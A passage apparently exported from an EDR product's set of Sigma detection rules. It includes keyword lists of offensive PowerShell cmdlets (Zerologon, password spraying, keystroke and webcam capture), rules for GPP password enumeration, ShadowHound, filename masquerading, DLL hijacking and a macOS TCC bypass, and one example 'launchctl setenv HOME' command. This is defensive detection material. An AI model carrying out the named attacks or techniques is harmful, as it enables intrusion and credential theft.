Invoke-winPEAS\n - 'Invoke-winPEAS'\n - 'SW52b2tlLXdpblBFQV'\n - 'ludm9rZS13aW5QRUFT'\n - 'JbnZva2Utd2luUEVBU'\n # Invoke-Zerologon\n - 'Invoke-Zerologon'\n - 'SW52b2tlLVplcm9sb2dvb'\n - 'ludm9rZS1aZXJvbG9nb2'\n - 'JbnZva2UtWmVyb2xvZ29u'\n # Get-USBKeystrokes\n - 
'Get-USBKeystrokes'\n - 'R2V0LVVTQktleXN0cm9rZX'\n - 'dldC1VU0JLZXlzdHJva2Vz'\n - 'HZXQtVVNCS2V5c3Ryb2tlc'\n # Start-WebcamRecorder\n - 'Start-WebcamRecorder'\n - 'U3RhcnQtV2ViY2FtUmVjb3JkZX'\n - 'N0YXJ0LVdlYmNhbVJlY29yZGVy'\n - 'TdGFydC1XZWJjYW1SZWNvcmRlc'\n # Invoke-OfficeScrape\n - 'Invoke-OfficeScrape'\n - 'SW52b2tlLU9mZmljZVNjcmFwZ'\n - 'ludm9rZS1PZmZpY2VTY3JhcG'\n - 'JbnZva2UtT2ZmaWNlU2NyYXBl'\n # Invoke-DomainPasswordSpray\n - 'Invoke-DomainPasswordSpray'\n - 'SW52b2tlLURvbWFpblBhc3N3b3JkU3ByYX'\n - 'ludm9rZS1Eb21haW5QYXNzd29yZFNwcmF5'\n - 'JbnZva2UtRG9tYWluUGFzc3dvcmRTcHJhe'\n # Invoke-SpraySinglePassword\n - 'Invoke-SpraySinglePassword'\n - 'SW52b2tlLVNwcmF5U2luZ2xlUGFzc3dvcm'\n - 'ludm9rZS1TcHJheVNpbmdsZVBhc3N3b3Jk'\n - 'JbnZva2UtU3ByYXlTaW5nbGVQYXNzd29yZ'\n\n exclusion_tsmanager:\n # C:\\Windows\\CCM\\TSManager.exe\n - ParentCommandLine:\n - '*smsswd.exe*/run:*powershell*Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList $false}*'\n - '*smsswd.exe*/run:*powershell*Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name TriggerSchedule*{00000000-0000-0000-0000-000000000001}*'\n - ProcessAncestors|contains: '?:\\Windows\\CCM\\TSManager.exe'\n - CommandLine|contains:\n - ' -Class sms_client -Name TriggerSchedule {00000000-0000-0000-0000-000000000021}'\n - \" -Class SMS_Client -Name TriggerSchedule '{00000000-0000-0000-0000-000000000021}'\"\n\n exclusion_configmgr:\n CommandLine:\n - '*Powershell.exe Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList $false'\n - '*powershell.exe Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList False'\n\n exclusion_ltsvc:\n CommandLine: 'powershell.exe -command & {(invoke-wmimethod -path ((get-wmiobject -class win32_volume -filter \"name=??:\\\\\\\\?\").__PATH) -name defraganalysis).defraganalysis}'\n ParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n # Veritas malware 
scanning utility: https://www.veritas.com/support/en_US/article.100053050\n exclusion_veritas:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c powershell.exe (Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"?:\\malware*\\nbmalwareutil.exe *\").ProcessId'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0fe5da5-765a-4b7d-9af5-6b711030daa3",
"rule_name": "Malicious PowerShell Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell's command-line, generally associated with online repositories containing attack codes to perform memory-only attacks.\nAttackers may use various PowerShell frameworks as they are easily installed and offer a very large panel of interactive functionnalities.\nIt is recommended to analyze the executed PowerShell script as well as the ancestors of the host process to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-03-05",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1125",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e178bd0c-a726-4ff0-9d5e-5269ca43c04b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626315Z",
"creation_date": "2026-03-23T11:45:34.626317Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626321Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp",
"https://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html",
"https://github.com/nettitude/PoshC2/blob/master/resources/modules/PrivescCheck.ps1",
"https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
"https://attack.mitre.org/techniques/T1552/006/"
],
"name": "t1552_006_gpp_passwords_powershell.yml",
"content": "title: GPP Passwords in Sysvol Enumerated via PowerShell\nid: e178bd0c-a726-4ff0-9d5e-5269ca43c04b\ndescription: |\n Detects PowerShell commands that may be used to enumerate Group Policy Preferences (GPP) passwords.\n GPP allows for configuration of Domain-attached machines via group policy. Domain machines periodically authenticate to the Domain Controller utilizing the Domain credentials of the logged-in user. Group Policies for account management are stored on the Domain Controller in XML files in the SYSVOL folder.\n Policies that contain the \"cpassword\" field will set the password for the contained account. This field is encrypted with an AES 32-bit key, which is the same for all Windows systems and is publically available.\n Attackers may enumerate these files to acquire domain passwords for further lateral movement.\n It is recommended to investigate this activity and check the SYSVOL folder for any affected accounts, as well as to hunt for any authentications to affected accounts after this alert.\nreferences:\n - https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp\n - https://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\n - https://github.com/nettitude/PoshC2/blob/master/resources/modules/PrivescCheck.ps1\n - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\n - https://attack.mitre.org/techniques/T1552/006/\ndate: 2025/12/31\nmodified: 2026/01/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.006\n - attack.t1552.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ScriptBlockText|contains: '.cpassword'\n\n exclusion_schtasks:\n 
ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e178bd0c-a726-4ff0-9d5e-5269ca43c04b",
"rule_name": "GPP Passwords in Sysvol Enumerated via PowerShell",
"rule_description": "Detects PowerShell commands that may be used to enumerate Group Policy Preferences (GPP) passwords.\nGPP allows for configuration of Domain-attached machines via group policy. Domain machines periodically authenticate to the Domain Controller utilizing the Domain credentials of the logged-in user. Group Policies for account management are stored on the Domain Controller in XML files in the SYSVOL folder.\nPolicies that contain the \"cpassword\" field will set the password for the contained account. This field is encrypted with an AES 32-bit key, which is the same for all Windows systems and is publically available.\nAttackers may enumerate these files to acquire domain passwords for further lateral movement.\nIt is recommended to investigate this activity and check the SYSVOL folder for any affected accounts, as well as to hunt for any authentications to affected accounts after this alert.\n",
"rule_creation_date": "2025-12-31",
"rule_modified_date": "2026-01-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1552.001",
"attack.t1552.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e17a52d2-26d0-4183-a68c-db872a7939ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086528Z",
"creation_date": "2026-03-23T11:45:34.086530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_match_legitimate_name_or_location.yml",
"content": "title: Parent Directory Masqueraded\nid: e17a52d2-26d0-4183-a68c-db872a7939ec\ndescription: |\n Detects a potential attempt to masquerade filenames or locations to match legitimate ones for the sake of evading defenses and observation.\n In this case, the process is executed from a directory literally named '...' (three dots), which is easy to mistake for the parent-directory reference '..' in a path or directory listing.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2022/12/26\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|contains: '/.../'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e17a52d2-26d0-4183-a68c-db872a7939ec",
"rule_name": "Parent Directory Masqueraded",
"rule_description": "Detects a potential attempt to masquerade filenames or locations to match legitimate ones for the sake of evading defenses and observation.\nIn this case, the process is executed from a directory literally named '...' (three dots), which is easy to mistake for the parent-directory reference '..' in a path or directory listing.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-03",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1adb17f-fb63-4bea-9ae9-71dd16550fbc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605225Z",
"creation_date": "2026-03-23T11:45:34.605229Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605236Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Friends-Security/ShadowHound",
"https://blog.fndsec.net/2024/11/25/shadowhound/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1018_shadowhound_execution.yml",
"content": "title: ShadowHound PowerShell Script Executed\nid: e1adb17f-fb63-4bea-9ae9-71dd16550fbc\ndescription: |\n Detects the usage of ShadowHound, a tool written in PowerShell that leverages native ADWS or LDAP features for Active Directory enumeration.\n This tool allows attackers to gather significant information about the Active Directory environment, possibly revealing hidden relationships to further perform attacks within the environment.\n It is recommended to analyze the execution context of the script to determine its legitimacy.\nreferences:\n - https://github.com/Friends-Security/ShadowHound\n - https://blog.fndsec.net/2024/11/25/shadowhound/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/26\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.discovery\n - attack.t1018\n - attack.t1482\n - attack.t1615\n - attack.t1201\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1033\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.ShadowHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection_ad_module:\n - PowershellScriptPath|endswith: '\\ShadowHound-ADM.ps1'\n - PowershellCommand|contains|all:\n - 'Process-AdObject'\n - 'Perform-ADQuery'\n - 'Get-TopLevelContainers'\n - 'Write-Output \"Objects have been processed and written to $OutputFilePath\"'\n - 'Write-Output \"[+] Found $($topLevelContainers.Count) top-level containers.\"'\n - \"Write-Output '[+] Executing with the following parameters:'\"\n - '$TopLevelContainers = Get-ADObject @topLevelParams '\n - '$objectClassMapping = @{'\n - 'Write-Output \"[*] Enumerating PKI objects under $configContext...\"'\n\n selection_ds_module:\n - PowershellScriptPath|endswith: '\\ShadowHound-DS.ps1'\n - PowershellCommand|contains|all:\n - 
'Process-AdObject'\n - 'Write-Output \"Objects have been processed and written to $OutputFile\"'\n - \"Write-Output '[+] Executing with the following parameters:'\"\n - 'Write-Output \"[*] Enumerating PKI objects under $configContext...\"'\n - \"$rootDSE = New-Object System.DirectoryServices.DirectoryEntry('LDAP://RootDSE')\"\n - '$searcher = New-Object System.DirectoryServices.DirectorySearcher($directoryEntry)'\n - '$directoryEntry = New-Object System.DirectoryServices.DirectoryEntry($ldapPath, $Credential.UserName, $Credential.GetNetworkCredential().Password)'\n - 'Write-Output \" [!!] Error during search with filter $ldapFilter`: $_\"'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1adb17f-fb63-4bea-9ae9-71dd16550fbc",
"rule_name": "ShadowHound PowerShell Script Executed",
"rule_description": "Detects the usage of ShadowHound, a tool written in PowerShell that leverages native ADWS or LDAP features for Active Directory enumeration.\nThis tool allows attackers to gather significant information about the Active Directory environment, possibly revealing hidden relationships to further perform attacks within the environment.\nIt is recommended to analyze the execution context of the script to determine its legitimacy.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1201",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1be9c6a-a1c4-43e8-8102-0de54255109a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086903Z",
"creation_date": "2026-03-23T11:45:34.086905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086909Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/defense-evasion/T1036.006/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md#atomic-test-2---space-after-filename",
"https://attack.mitre.org/techniques/T1036/006/",
"https://attack.mitre.org/techniques/T1546/001/"
],
"name": "t1036_006_blank_space_filename.yml",
"content": "title: Suspicious Blank Space at the End of the Process Filename\nid: e1be9c6a-a1c4-43e8-8102-0de54255109a\ndescription: |\n Detects the execution of a file containing a space at the end of its filename.\n If a user double-clicks a file whose name ends with a space, for instance 'evil.txt ', the OS determines the true file type from the content rather than from the apparent extension, and the binary is executed.\n Adversaries can use this feature to trick users into double-clicking benign-looking files of any format and ultimately execute malicious payloads.\n Adversaries may also append a space after a filename to mimic a legitimate binary.\n It is recommended to analyze the executed file for malicious content.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1036.006/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md#atomic-test-2---space-after-filename\n - https://attack.mitre.org/techniques/T1036/006/\n - https://attack.mitre.org/techniques/T1546/001/\ndate: 2022/12/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.006\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: ' '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1be9c6a-a1c4-43e8-8102-0de54255109a",
"rule_name": "Suspicious Blank Space at the End of the Process Filename",
"rule_description": "Detects the execution of a file containing a space at the end of its filename.\nIf a user double-clicks a file whose name ends with a space, for instance 'evil.txt ', the OS determines the true file type from the content rather than from the apparent extension, and the binary is executed.\nAdversaries can use this feature to trick users into double-clicking benign-looking files of any format and ultimately execute malicious payloads.\nAdversaries may also append a space after a filename to mimic a legitimate binary.\nIt is recommended to analyze the executed file for malicious content.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036.006",
"attack.t1546.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1dea3fd-6b91-4170-a356-35ec98f63914",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619602Z",
"creation_date": "2026-03-23T11:45:34.619604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619608Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9934",
"https://support.apple.com/HT211288",
"https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8",
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
],
"name": "cve_2020_9934_launchctl.yml",
"content": "title: TCC Daemon CVE-2020-9934 Exploited\nid: e1dea3fd-6b91-4170-a356-35ec98f63914\ndescription: |\n Detects the setting of an environment variable required to exploit CVE-2020-9934, which is related to the TCC daemon (tccd).\n TCC (Transparency, Consent, and Control) is a system present since the release of macOS Mojave (10.14) that protects access to some sensitive inputs such as screen captures, cameras, microphones and keyboard events.\n When an application tries to access certain functions, macOS prompts the user to confirm whether the request from the application is legitimate; the user can then grant or refuse access to the application.\n Before macOS 10.15.6, the TCC daemon (tccd) is vulnerable to environment variable hijacking.\n By setting the HOME env variable on launchctl and restarting the tccd daemon, an attacker could point tccd at an attacker-controlled copy of the TCC database and bypass TCC's consent prompts entirely (this is a TCC bypass, not a Gatekeeper bypass).\n The selection matches any 'launchctl setenv HOME' invocation, so on macOS 10.15.6 or later a match indicates an attempt rather than a successful exploitation.\n It is recommended to verify if the parent process setting the environment variable has legitimate reasons to do so.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9934\n - https://support.apple.com/HT211288\n - https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\ndate: 2023/07/11\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1574\n - cve.2020-9934\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Exploit.CVE-2020-9934\n - classification.macOS.Exploit.TCC\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n # launchctl setenv HOME /tmp/tccbypass\n selection:\n Image: '/bin/launchctl'\n CommandLine|contains|all:\n - ' setenv'\n - ' HOME '\n\n condition: 
selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1dea3fd-6b91-4170-a356-35ec98f63914",
"rule_name": "TCC Daemon CVE-2020-9934 Exploited",
"rule_description": "Detects the setting of an environment variable required to exploit CVE-2020-9934, which is related to the TCC daemon (tccd).\nTCC (Transparency, Consent, and Control) is a system present since the release of macOS Mojave (10.14) that protects access to some sensitive inputs such as screen captures, cameras, microphones and keyboard events.\nWhen an application tries to access certain functions, macOS prompts the user to confirm whether the request from the application is legitimate; the user can then grant or refuse access to the application.\nBefore macOS 10.15.6, the TCC daemon (tccd) is vulnerable to environment variable hijacking.\nBy setting the HOME env variable on launchctl and restarting the tccd daemon, an attacker could point tccd at an attacker-controlled copy of the TCC database and bypass TCC's consent prompts entirely (this is a TCC bypass, not a Gatekeeper bypass).\nThe selection matches any 'launchctl setenv HOME' invocation, so on macOS 10.15.6 or later a match indicates an attempt rather than a successful exploitation.\nIt is recommended to verify if the parent process setting the environment variable has legitimate reasons to do so.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2025-04-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e241f72f-20e6-4482-bc91-6c4981c9abc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090776Z",
"creation_date": "2026-03-23T11:45:34.090778Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090782Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ftp.yml",
"content": "title: DLL Hijacking via ftp.exe\nid: e241f72f-20e6-4482-bc91-6c4981c9abc0\ndescription: |\n Detects potential Windows DLL Hijacking via ftp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder, so it is found before the genuine system copy.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ftp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\napinsp.dll'\n - '\\nlansp_c.dll'\n - '\\pnrpnsp.dll'\n - '\\SspiCli.dll'\n - '\\winrnr.dll'\n - '\\wshbth.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e241f72f-20e6-4482-bc91-6c4981c9abc0",
"rule_name": "DLL Hijacking via ftp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ftp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder, so it is found before the genuine system copy.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
